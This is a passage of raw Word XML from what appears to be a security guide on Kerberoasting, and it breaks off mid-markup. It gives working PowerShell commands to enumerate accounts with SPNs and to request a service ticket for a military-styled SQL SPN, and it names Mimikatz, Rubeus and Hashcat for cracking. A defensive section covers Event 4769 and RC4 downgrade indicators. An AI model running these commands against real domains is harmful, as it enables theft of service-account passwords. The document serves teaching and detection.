    <w:p w14:paraId="5AB7FFA7" w14:textId="77777777" w:rsidR="00B4067B" w:rsidRPr="00B4067B" w:rsidRDefault="00B4067B" w:rsidP="00B4067B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Attackers target accounts with Service Principal Names (SPNs) because any domain user can request a Kerberos service ticket (TGS) for that SPN. The Active Directory domain controller returns the ticket encrypted with the target account’s password hash. The attacker dumps this ticket from local memory and cracks it offline.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD77E7C" w14:textId="77777777" w:rsidR="00B4067B" w:rsidRPr="00B4067B" w:rsidRDefault="00B4067B" w:rsidP="00B4067B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Attacker Execution (PowerShell / Tooling)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691C4C90" w14:textId="77777777" w:rsidR="00B4067B" w:rsidRDefault="00B4067B" w:rsidP="00B4067B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>An attacker uses built-in Active Directory cmdlets or specialized tools to find user accounts acting as services, and then requests the vulnerable tickets into their local memory space:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56EDB623" w14:textId="77777777" w:rsidR="00B4067B" w:rsidRPr="00B4067B" w:rsidRDefault="00B4067B" w:rsidP="00B4067B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38F72833" w14:textId="77777777" w:rsidR="00B4067B" w:rsidRPr="00B4067B" w:rsidRDefault="00B4067B">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="888888"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CC2E2C4" w14:textId="5D73A7BF" w:rsidR="00B4067B" w:rsidRPr="00B4067B" w:rsidRDefault="00B4067B">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="888888"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t># 1. Discover user-accounts with SPNs (Low-noise discovery)</w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Get-ADUser -Filter {ServicePrincipalName -like </w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"*"</w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">} -Properties ServicePrincipalName | </w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="397300"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Where-Object</w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="BC6060"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>$_</w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">.ObjectClass -eq </w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"user"</w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> -and </w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="BC6060"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>$_</w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">.Enabled -eq </w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="78A960"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>$true</w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="888888"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t># 2. Request a TGS ticket for a specific high-value SPN to place it in local memory</w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="397300"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Add-Type</w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> -AssemblyName System.IdentityModel</w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="397300"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>New-Object</w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList </w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"MSSQLSvc/sql01.mil-net.mil:1433"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3A8AFC" w14:textId="77777777" w:rsidR="00B4067B" w:rsidRDefault="00B4067B">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E499F88" w14:textId="77777777" w:rsidR="00B4067B" w:rsidRDefault="00B4067B" w:rsidP="00B4067B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33395337" w14:textId="300BC321" w:rsidR="00B4067B" w:rsidRPr="00B4067B" w:rsidRDefault="00B4067B" w:rsidP="00B4067B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Once the ticket resides in memory, the attacker uses an execution tool (like Mimikatz or Rubeus) to export the ticket file (</w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.kirbi</w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>) to disk, transfer it to an offline machine, and crack it via Hashcat.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393A33F5" w14:textId="37475FBD" w:rsidR="00B4067B" w:rsidRPr="00B4067B" w:rsidRDefault="00B4067B" w:rsidP="00B4067B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Defender Red Flags </w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> TTP </w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Evidence and </w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Artifacts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD105FF" w14:textId="77777777" w:rsidR="00B4067B" w:rsidRPr="00B4067B" w:rsidRDefault="00B4067B" w:rsidP="00B4067B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Windows Security Event ID 4769</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E802B8" w14:textId="10B7DB14" w:rsidR="00B4067B" w:rsidRPr="00B4067B" w:rsidRDefault="00B4067B" w:rsidP="00B4067B">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>A Kerberos service ticket was requested:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Look for an unusual surge of requests from a single source host or user account.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B13FED" w14:textId="77777777" w:rsidR="00B4067B" w:rsidRPr="00B4067B" w:rsidRDefault="00B4067B" w:rsidP="00B4067B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Encryption Downgrade</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F48F66" w14:textId="29C8C16D" w:rsidR="00B4067B" w:rsidRPr="00B4067B" w:rsidRDefault="00B4067B" w:rsidP="00B4067B">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A critical indicator is when the Ticket Encryption Type inside Event 4769 is explicitly flagged as </w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>0x17</w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (RC4-HMAC). This indicates the attacker is forcing an older, weaker encryption type to speed up offline cracking times. Normal modern enterprise traffic uses </w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>0x12</w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (AES-256).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412DFD78" w14:textId="77777777" w:rsidR="00B4067B" w:rsidRPr="00B4067B" w:rsidRDefault="00B4067B" w:rsidP="00B40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B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">   ┌─────────────────────────────────────────────────────────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C61AE07" w14:textId="77777777" w:rsidR="00B4067B" w:rsidRPr="00B4067B" w:rsidRDefault="00B4067B" w:rsidP="00B40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B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">   │             </w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="EE0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>ALERT</w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>: EVENT ID 4769 ANOMALY DETECTED           │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5E01C8" w14:textId="77777777" w:rsidR="00B4067B" w:rsidRPr="00B4067B" w:rsidRDefault="00B4067B" w:rsidP="00B40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B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">   ├─────────────────────────────────────────────────────────────┤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33773B2F" w14:textId="77777777" w:rsidR="00B4067B" w:rsidRPr="00B4067B" w:rsidRDefault="00B4067B" w:rsidP="00B40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B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">   │ </w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="EE0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Target Service</w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>:  MSSQLSvc/sql01.mil-net.mil:1433            │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002658A3" w14:textId="77777777" w:rsidR="00B4067B" w:rsidRPr="00B4067B" w:rsidRDefault="00B4067B" w:rsidP="00B40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B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">   │ </w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="EE0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Requesting User</w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>: low_priv_service_mesh                      │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A232188" w14:textId="77777777" w:rsidR="00B4067B" w:rsidRPr="00B4067B" w:rsidRDefault="00B4067B" w:rsidP="00B40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B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">   │ </w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="EE0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Encryption Type</w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>: 0x17 (RC4-HMAC)  &lt;-- CRITICAL RED FLAG     │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10CA40B8" w14:textId="77777777" w:rsidR="00B4067B" w:rsidRPr="00B4067B" w:rsidRDefault="00B4067B" w:rsidP="00B40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B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">   └─────────────────────────────────────────────────────────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A217A55" w14:textId="77777777" w:rsidR="00B4067B" w:rsidRPr="00B4067B" w:rsidRDefault="00B4067B" w:rsidP="00B4067B">
      <w:pPr>
        <w:spacing w:before="480" w:after="480" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B4067B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:pict w14:anchorId="2F9EFA49">
          <v:rect id="_x0000_i1080" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="092F785C" w14:textId="035D31EE" w:rsidR="00B4067B" w:rsidRPr="00B4067B" w:rsidRDefault="00B4067B" w:rsidP="00B4067B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w14:ligatures w14:val="none"/>
